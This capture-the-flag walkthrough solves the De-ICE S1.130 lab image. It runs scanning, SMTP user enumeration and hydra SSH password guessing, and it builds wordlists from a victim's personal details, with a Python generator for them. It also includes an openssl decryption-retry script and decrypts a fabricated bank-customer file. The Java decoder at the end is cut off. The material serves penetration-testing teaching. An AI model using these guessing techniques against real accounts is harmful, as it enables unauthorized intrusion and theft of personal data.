While digging through an old external drive I found the De-ICE LiveCDs and the walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not too many flags to deal with. All of the spoilers are in the walkthrough section so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
De-ICE S1.130
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso
Default IP: Not so fast buddy, that is one of the flags
Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts' bank information
Spoilers and Walkthrough
Port scan the image to get started. At this point I was having everyone do this through the Metasploit console instead of stand-alone nmap, so the results land in the workspace database.
msfconsole
workspace deice
db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24
You will need to exclude your own IP; 192.168.1.128 is mine. If you are running any other known systems on your network, add them to --exclude as a comma-separated list.
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.1 00:50:56:c0:00:08 Unknown device
192.168.1.2 00:50:56:e6:1d:4b Unknown device
192.168.1.20 00:0c:29:a4:37:1e Unknown device
192.168.1.123 00:0c:29:a4:37:1e slax Linux 2.6.X server
.1 and .2 are the VMware NAT interfaces. You can check those, but trust me. .123 is a different De-ICE LiveCD that is in the same database because I'm lazy. That leaves 192.168.1.20 as the target.
netdiscover is another option: it sends ARP requests and listens for the replies to find live hosts on the local segment. While it isn't integrated into Metasploit, I've used it on penetration tests to locate hosts for zero-knowledge internal tests.
netdiscover
Currently scanning: 192.168.66.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 00:50:56:c0:00:08 1 60 Unknown vendor
192.168.1.2 00:50:56:e7:84:3f 1 60 Unknown vendor
192.168.1.20 00:0c:29:1f:c6:f0 1 60 Unknown vendor
192.168.1.254 00:50:56:f9:37:34 1 60 Unknown vendor
The -sV and -O combination covers most of what -A does (-A also adds the default NSE scripts and a traceroute), but I've separated it out just to have this line of text to tell you that. When I originally did these walkthroughs the notes became progressively less detailed, since the small group was getting better each week. Since these are now stand-alone I will add a little more detail, hence the time mismatch.
msf > db_nmap -sV -O -F 192.168.1.20
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.0.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp open smtp Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open pop3 Openwall popa3d
[*] Nmap: 143/tcp open imap UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.13 - 2.6.32
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: slax.example.net; OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds
In a normal penetration test, if this was the only host in scope, I would dig through the FTP and HTTP sites for data in parallel with vulnerability identification. We have used the Nikto web vulnerability scanner in the past and will use it again here. Nikto identifies itself with the User-Agent string Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID). That can be changed in /etc/nikto.conf, or the scan can be pushed through the Burp proxy to rewrite the User-Agent. Most network security appliances and hardened web servers will not give good results to Nikto scans, because its default traffic is well known and easily signatured.
nikto -h 192.168.1.20
http://192.168.1.20/info.php has good info: it is typically a phpinfo() page, which exposes the PHP version, loaded modules, configuration and filesystem paths. An exposed phpinfo page is worth checking for on any test and will usually be a finding in the penetration test report.
Anonymous FTP login is accepted, but listing the directory throws an error, so there is no viable path there.
Connected to 192.168.1.20.
220 (vsFTPd 2.0.4)
Name (192.168.1.20:root): anonymous
230 Login successful.
ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek
In parallel, start a password attack on SSH against root using rockyou. See the S1.100 tutorial for how to set it up. While the brute force runs, let's look at some other low-hanging fruit.
Let's start by looking at the SMTP server.
use auxiliary/scanner/smtp/smtp_enum
The SMTP server pops back some good info (smtp_enum uses VRFY, EXPN and RCPT TO to confirm which local usernames exist), so let's follow that rabbit hole. We also have one possible username from the website (customerserviceadmin@nosecbank.com). Let's build out a list of candidate usernames for the attacks.
Usernames
customerserviceadmin
customeradmin
csadmin
adm
bin
daemon
dbadmin
ftp
gdm
operator
postmaster
sysadmin
webmaster
After some time passes you should get a password back. I used xHydra to show the GUI interface, but any online password-guessing tool will work.
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.1.20:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.20:22
[22][ssh] host: 192.168.1.20 login: csadmin password: rocker
SSH to the server using ssh csadmin@192.168.1.20 and rifle through the file system.
csadmin@192.168.1.20's password:
Linux 2.6.16.
csadmin@slax:~$ ls
mailserv_download/
csadmin@slax:~$ cd mailserv_download/
csadmin@slax:~/mailserv_download$ ls
2010122014234.j12Gqo4H049241 2010122216451.f81Ltw4R010211.part2
Multiple files, and one of them is a .part2; better figure that out later. Maybe I can just read the text part with cat.
csadmin@slax:~/mailserv_download$ cat *
To: csadmin@nosecbank.com
CC:
Subject: My Son's Birthday
Date: Mon, 20 Dec 2010 14:23:46 +0500
Return-Path: <sdadmin@nosecbank.com>
Delivered-To: csadmin:nosecbank.com@nosecbank.com
Received: (qmail 20281 invoked from network); 20 Dec 2010 09:23:46 -0000
X-Received: from network (192.168.1.123) by mailserv1-3.us6.service.com;
20 Dec 2010 09:23:46 -0000
Received: from www.nosecbank.com (unknown [198.65.139.34]) by
srv5.us6.service.com (Postfix) with ESMTP id D98402459DD for
<csadmin@nosecbank.com>; Mon, 20 Dec 2010 09:23:46 +0000 (GMT)
Message-Id: <2010122014234.j12Gqo4H049241@www.nosecbank.com>
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="---=_NextPart_000_0000_02F24S11.FEPQRE80"
X-Mailer: K-Mail; Build 1.0.5510
Thread-Index: Qw2cWVmE3odZs3TqTTqFvS1e3lexms==
Message: Hey Mark, I am curious if you would be free to come over and
visit for my son Donovin's birthday tomorrow after work. I would also
appreciate if you brought Andy with you as well, because Donny
really enjoyed playing with him last time he was over. I know its short
notice but he is turning 12 and it is special for both him and me. Let
me know if this works. Thanks! -Paul
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
///////////////------ ERROR: MESSAGE CORRUPTED -------///////////////
Let's build a second attack based on the content of that email. The mail is dated 20 Dec 2010, the birthday is "tomorrow", and Donovin is turning 12, so his date of birth is 21 Dec 1998; the candidates below combine his name with pieces of that date.
Username
sdadmin
Passwords
donovin
Donovin
donovin21
Donovin21
donovin98
Donovin98
donovin1221
Donovin1221
donovin122198
Donovin122198
donovin12211998
Donovin12211998
donovin211998
Donovin211998
donovin1998
Donovin1998
Second verse, same as the first. From checking the home folder you know that Fred is the databaser. As a life pro tip, don't trust people like Fred.
Username
dbadmin
Passwords
databaser
Databaser
databaser1
databaser2
databaser3
databaser4
databaser5
databaser6
databaser7
databaser8
databaser9
databaser0
databaser!
databaser@
databaser#
databaser$
databaser%
databaser^
databaser&
databaser*
databaser(
databaser)
Databaser1
Databaser2
Databaser3
Databaser4
Databaser5
Databaser6
Databaser7
Databaser8
Databaser9
Databaser0
Databaser!
Databaser@
Databaser#
Databaser$
Databaser%
Databaser^
Databaser&
Databaser*
Databaser(
Databaser)
databaser10
databaser11
databaser12
databaser13
databaser14
databaser15
databaser16
databaser17
databaser18
databaser19
databaser20
databaser21
databaser22
databaser23
databaser24
databaser25
databaser26
databaser27
databaser28
databaser29
databaser30
databaser31
databaser32
databaser33
databaser34
databaser35
databaser36
databaser37
databaser38
databaser39
databaser40
databaser41
databaser42
databaser43
databaser44
databaser45
databaser46
databaser47
databaser48
databaser49
databaser50
databaser51
databaser52
databaser53
databaser54
databaser55
databaser56
databaser57
databaser58
databaser59
databaser60
databaser61
databaser62
databaser63
databaser64
databaser65
databaser66
databaser67
databaser68
databaser69
databaser70
databaser71
databaser72
databaser73
databaser74
databaser75
databaser76
databaser77
databaser78
databaser79
databaser80
databaser81
databaser82
databaser83
databaser84
databaser85
databaser86
databaser87
databaser88
databaser89
databaser90
databaser91
databaser92
databaser93
databaser94
databaser95
databaser96
databaser97
databaser98
databaser99
Databaser10
Databaser11
Databaser12
Databaser13
Databaser14
Databaser15
Databaser16
Databaser17
Databaser18
Databaser19
Databaser20
Databaser21
Databaser22
Databaser23
Databaser24
Databaser25
Databaser26
Databaser27
Databaser28
Databaser29
Databaser30
Databaser31
Databaser32
Databaser33
Databaser34
Databaser35
Databaser36
Databaser37
Databaser38
Databaser39
Databaser40
Databaser41
Databaser42
Databaser43
Databaser44
Databaser45
Databaser46
Databaser47
Databaser48
Databaser49
Databaser50
Databaser51
Databaser52
Databaser53
Databaser54
Databaser55
Databaser56
Databaser57
Databaser58
Databaser59
Databaser60
Databaser61
Databaser62
Databaser63
Databaser64
Databaser65
Databaser66
Databaser67
Databaser68
Databaser69
Databaser70
Databaser71
Databaser72
Databaser73
Databaser74
Databaser75
Databaser76
Databaser77
Databaser78
Databaser79
Databaser80
Databaser81
Databaser82
Databaser83
Databaser84
Databaser85
Databaser86
Databaser87
Databaser88
Databaser89
Databaser90
Databaser91
Databaser92
Databaser93
Databaser94
Databaser95
Databaser96
Databaser97
Databaser98
Databaser99
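Both of the lists above are generated by a simple rule (a name plus fragments of a date of birth, and a base word plus digit or symbol suffixes), so they are easier to script than to type. The following is an added example, not part of the original walkthrough: it reproduces the sdadmin and dbadmin candidate lists exactly and writes them to files for hydra. The name, date of birth and base word are the walkthrough's; the generation rule, the output file names and the hydra command lines are assumptions.

```python
#!/usr/bin/env python3
"""Targeted wordlist generator for the two SSH guessing attacks above.

Added example, not from the original De-ICE walkthrough. Reproduces the
sdadmin list (name + date-of-birth fragments) and the dbadmin list
(base word + digit/symbol suffixes) so they can be fed to hydra.
"""
from datetime import date
from typing import Iterable, List

# Shift-number row: the symbol suffixes used in the dbadmin list above.
SYMBOLS = "!@#$%^&*()"


def dedupe(words: Iterable[str]) -> List[str]:
    """Drop duplicates while keeping first-seen order (hydra does not dedupe)."""
    seen = set()
    out = []
    for w in words:
        if w not in seen:
            seen.add(w)
            out.append(w)
    return out


def name_date_candidates(name: str, dob: date) -> List[str]:
    """Combine a name with the date fragments people actually use in passwords.

    Fragments in order: none, DD, YY, MMDD, MMDDYY, MMDDYYYY, DDYYYY, YYYY.
    Each fragment is emitted in lower case and then Capitalized, which is
    the order of the sdadmin list above.
    """
    dd, mm = f"{dob.day:02d}", f"{dob.month:02d}"
    yyyy, yy = f"{dob.year:04d}", f"{dob.year % 100:02d}"
    fragments = ["", dd, yy, mm + dd, mm + dd + yy, mm + dd + yyyy, dd + yyyy, yyyy]
    return dedupe(
        base + frag
        for frag in fragments
        for base in (name.lower(), name.capitalize())
    )


def suffix_candidates(word: str) -> List[str]:
    """word, word1..word9, word0, word!..word), then word10..word99, both cases.

    Single-character suffixes for both cases come first so the cheap guesses
    are tried before the 90 two-digit ones, matching the dbadmin list above.
    """
    cases = (word.lower(), word.capitalize())
    out = []
    for base in cases:
        out.append(base)
        out.extend(base + str(n) for n in range(1, 10))
        out.append(base + "0")
        out.extend(base + s for s in SYMBOLS)
    for base in cases:
        out.extend(base + str(n) for n in range(10, 100))
    return dedupe(out)


def write_wordlist(path: str, words: Iterable[str]) -> int:
    """Write one candidate per line; returns the number written."""
    words = list(words)
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    # Inputs from the walkthrough: the son's name and DOB from the e-mail,
    # "databaser" from the hint in the home directories. File names are
    # assumptions.
    n = write_wordlist("sdadmin.txt", name_date_candidates("Donovin", date(1998, 12, 21)))
    m = write_wordlist("dbadmin.txt", suffix_candidates("databaser"))
    print(f"wrote {n} sdadmin and {m} dbadmin candidates")
    print("hydra -l sdadmin -P sdadmin.txt ssh://192.168.1.20")
    print("hydra -l dbadmin -P dbadmin.txt ssh://192.168.1.20")
```

The printed hydra lines are the command-line equivalent of the xHydra runs in the walkthrough: one known username (-l) against the generated list (-P). Keep the lists small and targeted like this; SSH guessing is slow and noisy, and a few hundred context-derived candidates usually beat a million generic ones.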
Hey look, a .part1; let's put all that together. I had to cook this part from another walkthrough because Java programming is not my forte. The code can be found at the bottom of this post. I named the file Decoder.java, but you can be as creative as you want, as long as the public class name matches the file name or javac will refuse to compile it. Note that the snippet prompts for the username on standard input rather than taking it from the command line.
javac Decoder.java
java Decoder sysadmin
java Decoder root
Once you find this file (useracc_update.csv.enc), try the openssl decryption, similar to earlier De-ICE challenges. Hint: look in the sysadmin profile for the password. A "bad decrypt" from openssl enc means the password, the cipher, or the digest used to derive the key from the password did not match; below, the interactive aes-256-cbc attempt fails and the same cipher with -k succeeds, so the password was presumably mistyped at the prompt. One more caveat if you copy the file off the box instead of decrypting it in place: the 2006-era OpenSSL on the image derives the key with MD5, while OpenSSL 1.1.0 and later default to SHA-256, so add -md md5 when decrypting on a modern attack box.
root@slax:/home/ftp/incoming# openssl enc -aes-128-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-128-cbc decryption password:
bad decrypt
25228:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv
enter aes-256-cbc decryption password:
bad decrypt
25311:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
root@slax:/home/ftp/incoming# openssl enc -aes-256-cbc -d -in useracc_update.csv.enc -out useracc_update.csv -k 31/Fwxw+2
root@slax:/home/ftp/incoming# cat user (tab completion lists both files)
useracc_update.csv useracc_update.csv.enc
root@slax:/home/ftp/incoming# cat useracc_update.csv
ID,Last,First,Email,State,Username,Password,Verifacation Code,Pin code
1000,Carr,Alfred,acarr23@gmail.com,NY,acarr9096,phantom4,952733,490
1001,Karson,William,wkarson53@yahoo.com,NY,wkarson2431,rockallday123,567094,345
1002,Wheeler,Cordy,megawheels98@rocketmail.com,NY,cwheeler5031,goeagles90,462724,631
1003,Smith,Ken,synthesizer_1r@gmail.com,NY,ksmith6253,crystalization,636721,353
1004,Quinn,Cynthia,qcq92@aol.com,NY,cquinn1217,archyandhenry,680247,223
1005,Floyd,Wilson,jukeboxer_4life@gmail.com,NY,wfloyd5931,knockout66,521456,441
1006,Blake,Markus,sil3nt_gunn3r@yahoo.com,NY,mblake6947,268768924,129632,557
1007,Nash,Jillian,wiselife141@aol.com,NY,jnash0934,checkitout1,324672,315
1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124
1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134
1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579
1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337
That is the last flag. This challenge was personally tough because of all the Java code and encryption involved, which aren't part of my normal day-to-day penetration tests.
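The "bad decrypt" dead ends above are the common failure mode with openssl enc: the password, the cipher, or the key-derivation digest is wrong, and the error looks the same for all three. The following is an added example, not from the walkthrough, that inspects the file header and then retries decryption across a small set of cipher and digest combinations, validating the plaintext rather than trusting the exit code alone (with a wrong key, CBC padding still comes out valid roughly one time in 256). The file names and the password are the walkthrough's; the candidate cipher and digest lists, the CSV validator and the helper names are assumptions.

```python
#!/usr/bin/env python3
"""Retry openssl enc decryption across cipher/digest combinations.

Added example, not from the original walkthrough. Old OpenSSL derived the
key from the password with MD5; OpenSSL 1.1.0 and later default to SHA-256,
so a file encrypted on the 2006-era target may need "-md md5" on a modern
attack box. This wrapper tries the combinations and checks the output.
"""
import os
import shutil
import subprocess
import tempfile
from typing import Callable, Optional, Sequence, Tuple

# Candidate lists are assumptions; extend them for other challenges.
CIPHERS = ("aes-256-cbc", "aes-128-cbc", "aes-192-cbc", "des3")
DIGESTS = ("md5", "sha256", "sha1")
MAGIC = b"Salted__"  # header openssl enc writes when a salt is used (the default)


def inspect_header(data: bytes) -> dict:
    """Report whether data looks like an openssl enc salted file."""
    salted = data[:8] == MAGIC
    return {
        "salted": salted,
        "salt": data[8:16].hex() if salted else None,
        # CBC ciphertext length must be a multiple of the 16-byte block size
        "block_aligned": (len(data) - (16 if salted else 0)) % 16 == 0,
    }


def looks_like_csv(plaintext: bytes) -> bool:
    """Validator for this challenge: the decrypted file is an ASCII CSV."""
    try:
        text = plaintext.decode("ascii")
    except UnicodeDecodeError:
        return False
    return ("," in text.splitlines()[0]) if text else False


def try_decrypt(enc_path: str, password: str, out_path: str,
                validate: Callable[[bytes], bool] = looks_like_csv,
                ciphers: Sequence[str] = CIPHERS,
                digests: Sequence[str] = DIGESTS) -> Optional[Tuple[str, str]]:
    """Return the (cipher, digest) pair that yields valid plaintext, else None."""
    for cipher in ciphers:
        for digest in digests:
            cmd = ["openssl", "enc", "-d", "-" + cipher, "-md", digest,
                   "-pass", "pass:" + password, "-in", enc_path, "-out", out_path]
            res = subprocess.run(cmd, capture_output=True)
            if res.returncode != 0:
                continue  # "bad decrypt": wrong key material or wrong cipher
            with open(out_path, "rb") as fh:
                if validate(fh.read()):
                    return cipher, digest
    return None


def selftest() -> Optional[Tuple[str, str]]:
    """Encrypt a constructed CSV with a known cipher/digest and recover it.

    Returns None when no openssl binary is available, otherwise the pair found.
    """
    if shutil.which("openssl") is None:
        return None
    with tempfile.TemporaryDirectory() as tmp:
        plain, enc, out = (os.path.join(tmp, n) for n in ("p.csv", "p.enc", "p.out"))
        with open(plain, "wb") as fh:
            fh.write(b"ID,Last,First\n1000,Carr,Alfred\n")  # constructed sample
        subprocess.run(["openssl", "enc", "-aes-128-cbc", "-md", "sha256",
                        "-pass", "pass:31/Fwxw+2", "-in", plain, "-out", enc],
                       check=True, capture_output=True)
        with open(enc, "rb") as fh:
            assert inspect_header(fh.read())["salted"]
        return try_decrypt(enc, "31/Fwxw+2", out)


if __name__ == "__main__":
    # Run from the directory holding the challenge file.
    print(try_decrypt("useracc_update.csv.enc", "31/Fwxw+2", "useracc_update.csv"))
```

When run against the challenge file with the password from the sysadmin profile, the pair it reports is the one to put in the openssl command line; if nothing validates, the password is wrong, not the cipher. The validator is the important part: on a real engagement, swap looks_like_csv for whatever the expected plaintext actually is (a magic number, a known header), because a zero exit code alone is not proof of a correct key.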
import java.io.*;
// Password generator from the challenge. The class is named Decoder here so it
// matches the file name Decoder.java used in the commands above (javac requires
// a public class to match its file name). The body of processLoop() is not
// reproduced on this page.
public class Decoder
{
public static void main(String[] args)
{
try
{
System.out.println("[*] Password Generator");
// The username is read from standard input, not from args.
BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
System.out.print("[?] Username: ");
String input=in.readLine();
int[] output=processLoop(input);
String outputASCII="";
for(int i=0; i